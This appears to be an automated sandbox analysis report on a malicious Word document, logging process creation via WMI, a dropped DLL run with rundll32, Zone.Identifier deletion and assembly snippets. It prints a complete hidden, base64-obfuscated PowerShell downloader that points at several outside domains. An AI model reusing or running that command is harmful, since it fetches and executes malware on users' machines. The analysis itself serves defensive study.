JwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00180A90 push edx; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00169A06 push esi; iretd
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001700C8 push es; retn 0000h
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00452D98 push 00452E25h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00460020 push 00460058h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00454038 push 00454064h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0042A0B2 push 0042A0E0h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0042A0B4 push 0042A0E0h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0042B274 push 0042B2CDh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0043C34C push 0043C378h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0042E450 push ecx; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004604F4 push 0046055Ch; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00460498 push 004604EFh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004605F0 push 0046063Ch; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00460580 push 004605ACh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0045B588 push 0045B5CAh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004605B8 push 004605E4h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00460654 push 00460680h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004606C4 push 004606F0h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0042D6DC push 0042D751h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0042E6F0 push ecx; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0046068C push 004606B8h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0042E696 push ecx; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00428748 push 00428774h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0042E750 push ecx; mov dword ptr [esp], edx
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0042D754 push 0042D7ADh; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004607E4 push 00460827h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00428798 push 004287C4h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_004637A8 push 004637E0h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00463848 push 00463874h; ret
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0046086C push 00460898h; ret

                      Persistence and Installation Behavior:

                      barindex
                      Creates processes via WMIShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Kaktksw\An6othh\N49I.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhjJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Kvmkgtcj\aykivov.nhj:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Unxqf\ouoi.jab:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Iemuqepepuxnfb\fiqpbnltnychm.qgs:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Qzwbjgb\bmqjkk.hhh:Zone.Identifier read attributes | delete
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 552Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: powershell.exe, 00000005.00000002.2104262504.0000000000134000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00401D4D mov eax, dword ptr fs:[00000030h]
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001612C1 mov eax, dword ptr fs:[00000030h]
